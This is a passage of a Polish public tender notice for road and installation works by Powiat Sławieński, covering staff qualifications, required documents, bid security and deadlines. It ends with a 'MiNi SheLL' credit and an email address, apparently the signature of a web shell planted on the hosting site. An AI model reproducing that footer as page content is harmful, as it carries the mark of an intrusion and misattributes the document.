budowlane,<br/>- 1 osobą - kierownik robót branżowych posiadający uprawnienia budowlane do kierowania robotami w specjalności<br/>instalacyjnej w zakresie sieci, instalacji<br/>i urządzeń elektrycznych i elektroenergetycznych zgodne z ustawą Prawo budowlane,<br/>- 1 osobą - projektant posiadający uprawnienia do projektowania w specjalności inżynieryjnej drogowej oraz w przypadku<br/>realizacji zamówienia aktualną przynależność do właściwej Izby.<br/>- 1 osobą - projektant posiadający uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz w przypadku realizacji zamówienia<br/>aktualną przynależność do właściwej Izby,<br/>- 1 osobą - projektant posiadający uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń elektrycznych i elektroenerge- tycznych oraz w przypadku realizacji zamówienia aktualną przynależność do<br/>właściwej Izby.<br/>Uwaga: Wykonawca winien wykazać się osobą posiadającymi uprawnienia budowlane do sprawowania samodzielnych<br/>funkcji technicznych w budownictwie, zgodnie z wymaganymi przepisami ustawy Prawo budowlane lub innymi<br/>uprawnieniami umożliwiającymi wykonywanie tych samych czynności, do wykonania których w aktualnym stanie prawnym<br/>upoważniają uprawnienia budowlane w tej samej specjalności.<br/>Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza<br/>odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy prawo budowlane (t. j. Dz. U. z 2020 r., poz. 1333)<br/>oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.<br/>z 2020 r., poz. 220).<br/>Uwagi:<br/>1. W przypadku osób będących obywatelami państw członkowskich UE, Konfederacji Szwajcarskiej lub państw<br/>członkowskich (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym - prawo do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie na terytorium RP winno być potwierdzone odpowiednią decyzją dającą prawo do<br/>świadczenia usług transgranicznych.<br/>2. DOTYCZY ZADANIA III:<br/>- 1 osobą - kierownik budowy/ kierownik robót drogowych - posiadający uprawnienia budowlane do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie w specjalności drogowej, bez ograniczeń zgodne z ustawą Prawo<br/>budowlane,<br/>- 1 osobą – kierownik robót branżowych posiadający uprawienia budowlane do sprawowania samodzielnych funkcji<br/>technicznych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych oraz<br/>wodociągowych i kanalizacyjnych zgodne z ustawą Prawo budowlane,<br/>- 1 osobą - kierownik robót branżowych posiadający uprawnienia budowlane do kierowania robotami w specjalności<br/>instalacyjnej w zakresie sieci, instalacji<br/>i urządzeń elektrycznych i elektroenergetycznych zgodne z ustawą Prawo budowlane.<br/>WAŻNE:<br/>1. Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że<br/>wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze<br/>wykonawcy może mieć negatywny wpływ na realizację zamówienia [art. 116 ust. 2 ustawy pzp].<br/>2. Jeżeli wykonawca powołuje sią na doświadczenie w realizacji robót budowlanych, wykonanych wspólnie z innymi<br/>wykonawcami, wykaz o którym mowa w rozdziale 25 pkt. 2.1. SWZ, dotyczy robót budowlanych faktycznie przez niego<br/>wykonanych; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2. Zamawiający w celu<br/>potwierdzenia spełnienia warunków udziału w postępowaniu, wezwie wykonawcę, którego oferta została najwyżej oceniona, do<br/>złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych,<br/>aktualnych na dzień złożenia, tj. [art. 274 ust. 1 ustawy pzp]:<br/>2.1. wykazu robót wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były świadczone, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ten warunek.<br/>Wykaz należy przygotować wg wzoru stanowiącego załącznik nr 5 a do SWZ.<br/>W przedmiotowym wykazie robót wykonawca winien wskazać informacje w zakresie określonym w warunkach z Rozdziału 24 ppkt.<br/>3.4.1 SWZ.<br/>2.2. wykazu osób niezbędnych do realizacji zamówienia publicznego, wraz z informacją o podstawie do dysponowania tymi<br/>zasobami;<br/>Wykaz osób należy sporządzić wg wzoru stanowiącego załącznik nr 9 do SWZ.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ten warunek.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten/ dokumenty te składa przynajmniej<br/>jeden z wykonawców.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ten warunek.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten/ dokumenty te składa przynajmniej<br/>jeden z wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>oświadczenia wykonawcy,<br/>w zakresie art. 108 ust. 1 pkt 5 ustawy pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16<br/>lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik<br/>nr 13 do SWZ;<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji<br/>W przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ten składa każdy z<br/>wykonawców oddzielnie (jeśli dotyczy).<br/>1. Jeżeli wykonawca polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów<br/>udostępniających zasoby na zasadach określonych w art. 118 ustawy pzp, zamawiający żąda od wykonawcy przedstawienia wyżej<br/>wymienionych podmiotowych środków dowodowych dotyczących tych podmiotów, potwierdzających że nie zachodzą wobec tych<br/>podmiotów podstawy wykluczenia z postępowania.<br/>2. Jeżeli wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcy, który nie jest podmiotem udostępniającym<br/>zasoby na zasadach określonych w art. 118 ustawy pzp, zamawiający żąda od wykonawcy przedstawienia wyżej wymienionych<br/>podmiotowych środków dowodowych dotyczących tych podwykonawców, potwierdzających że nie zachodzą wobec tych<br/>podwykonawców podstawy wykluczenia z postępowania.<br/>3. Dokumenty potwierdzające braku podstaw wykluczenia wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium<br/>Rzeczpospolitej Polskiej:<br/>Zamiast: odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>o których mowa w Rozdziale 25 ust. 3 SWZ – składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma<br/>siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br/>- nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokument ten, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem. [§3 ust. 2 rozp. o którym mowa w art.<br/>128 ust. 6 ustawy pzp].</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. oświadczenie o spełnianiu warunków udziału w postępowaniu – którego wzór stanowo załącznik nr 2 do SWZ,<br/>2. oświadczenie o niepodleganiu wykluczeniu na podstawie art. 108 ust. 1 pkt 1 – 6 i art. 109 ust. 1 pkt 4 ustawy pzp –<br/>którego wzór stanowo załącznik nr 3 do SWZ<br/>3. zobowiązanie podmiotu udostępniającego zasoby - wzór zobowiązania stanowi załącznik nr 7 do SWZ.<br/>4. oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia - wzór oświadczenia stanowi załącznik nr<br/>8 do SWZ.<br/>5. Wypełniony kosztorys ofertowy, sporządzony w oparciu o załączony przedmiar robót, dokumentację techniczną i wiedzę<br/>wykonawcy w zakresie realizacji robót, niezbędnych do prawidłowego ukończenia zadania.<br/>6. pełnomocnictwo - wzór oświadczenia stanowi załącznik nr 6 do SWZ.<br/>7. potwierdzenie wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium, w wysokości :<br/>– 50.000,00 złotych (słownie: pięćdziesiąt tysięcy złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium wnoszone w formie pieniądza wnosi się przelewem na rachunek bankowy Zamawiającego w Bałtyckim Banku<br/>Spółdzielczym w Darłowie nr rachunku 79 8566 0003 0000 4141 2000 0007 z dopiskiem „wadium – nr DI.272.7.2022.I” Za<br/>termin wniesienia wadium uważa się termin uznania rachunku bankowego Zamawiającego.<br/>5. Wadium w pieniądzu przechowywane jest na rachunku bankowym.<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 PZP,<br/>Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Wadium nie może<br/>zawierać klauzuli zwalniającej gwaranta lub poręczyciela od odpowiedzialności wskutek zwrotu oryginału dokumentu<br/>gwarancyjnego do gwaranta lub poręczyciela.<br/>7. Wadium wnoszone w formie gwarancji lub poręczenia winno:<br/>1) być wystawione na POWIAT SŁAWIEŃSKI, ul. SEMPOŁOWSKIEJ 2A, 76-100 Sławno,<br/>2) wskazywać nr postępowania i nazwę zamówienia oraz nr części,<br/>3) zawierać zobowiązanie Gwaranta lub Poręczyciela do nieodwołalnego i bezwarunkowego zapłacenia kwoty wadium na<br/>pierwsze pisemne żądanie zapłaty Zamawiającego, w przypadku zaistnienia co najmniej jednego z warunków zatrzymania<br/>wadium określonego w ustawie z dnia 11 września 2019 r. Prawo zamówień publicznych,<br/>4) Gwarant (Poręczyciel) nie może uzależniać dokonania zapłaty od spełnienia jakichkolwiek dodatkowych warunków lub od<br/>przedłożenia jakiejkolwiek dokumentacji,<br/>5) termin obowiązywania gwarancji lub poręczenia nie może być krótszy niż termin związania ofertą,<br/>6) w przypadku gdy, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wnoszą wadium w postaci gwarancji lub<br/>poręczenia to z ich treści musi wynikać, że odnoszą się one zarówno do zleceniodawcy gwarancji lub poręczenia jak i<br/>wszystkich pozostałych Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8. Zaleca się aby dokument wadialny (gwarancje lub poręczenia), stanowił osobny plik opatrzony nazwą „Wadium_[nr<br/>referencyjny postępowania]” złożony wraz z ofertą i innymi dokumentami w jednym pliku archiwum (.zip).<br/>9. Oferta Wykonawcy, który nie wniósł wadium, lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98<br/>ust. 2 pkt 3 PZP, zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14) PZP.10. Zamawiający zwróci wadium na zasadach<br/>i w okolicznościach wskazanych w art. 98 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.3. OŚWIADCZENIE WYKONAWCÓW WSPÓLNIE UBIEGAJĄCY SIĘ O UDZIELENIE ZAMÓWIENIA (konsorcjum,<br/>spółka<br/>cywilna itp.)<br/>a) W przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy pzp, wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z<br/>którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy [art. 117 ust. 4 ustawy pzp] -<br/>wzór oświadczenia stanowi załącznik nr 8 do SWZ.<br/>b) Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>art. 112 ust. 2 pkt 2 ustawy pzp, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i<br/>zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. [art. 117 ust. 2 ustawy<br/>pzp]<br/>c) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. [art. 117 ust. 3 ustawy pzp]. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany, jakie strony chciałyby wprowadzić do ustaleń wynikających z przedmiotowej umowy wymagają pod<br/>rygorem nieważności formy pisemnej i zgody obu stron.<br/>2. Na mocy ustawy PZP zakazuje się istotnych zmian postanowień zawartej umowy, chyba że Zamawiający przewidział<br/>możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w dokumentach zamówienia zgodnie z art. 455 ust. 1 pkt<br/>1 PZP.<br/>3. Zmiany postanowień zawartej umowy, może wynikać z następujących okoliczności:<br/>1) zmian regulacji prawnych obowiązujących w dniu podpisania umowy a związanych z realizacją niniejszej umowy,<br/>2) za zgodą Zamawiającego, zmiana terminu wykonania z powodu okoliczności niezawinionych przez Wykonawcę,<br/>należycie udowodnionych,<br/>3) zaistnieją zdarzenia siły wyższej, które uniemożliwiłyby terminowe wykonanie zobowiązań (strony mogą wówczas ustalić<br/>odpowiednio zmieniony termin wykonania przedmiotu umowy),<br/>4) wskazanych w § 14 umowy,<br/>5) wskazanych w § 11 ust. 6 – ust. 20 umowy,<br/>6) w przypadkach określonych w art.455 ust.1 pkt. 1-4 i ust. 2 ustawy PZP,<br/>7) zmian z powodu okoliczności związanych z wystąpieniem skutków COVID-19.<br/>4. Podstawę do zmiany umowy, o której mowa w ust. 3 pkt 4, stanowić będzie protokół konieczności sporządzony przez<br/>koordynatora Inspektorów nadzoru i zaakceptowany przez Zamawiającego, z którego powinno wynikać, że spełnione są<br/>ustawowe lub umowne przesłanki uzasadniające konieczność dokonania zmiany umowy.<br/>5. Do czasu uzyskania na piśmie pod rygorem nieważności akceptacji ze strony Zamawiającego oraz Inspektora nadzoru w<br/>postaci stosownego protokołu konieczności oraz zawarcia stosownego aneksu, Wykonawca nie może wykonywać robót<br/>mających być podstawą do zmiany umowy. W przypadku wykonania tych robót bez zawarcia aneksu, Wykonawcy nie<br/>przysługuje z tego tytułu wynagrodzenie dodatkowe <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub osobistym za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu (na stronie: miniPortal.uzp.gov.pl). Zaszyfrowanie oferty nastąpi na stronie miniPortal.uzp.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-30 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com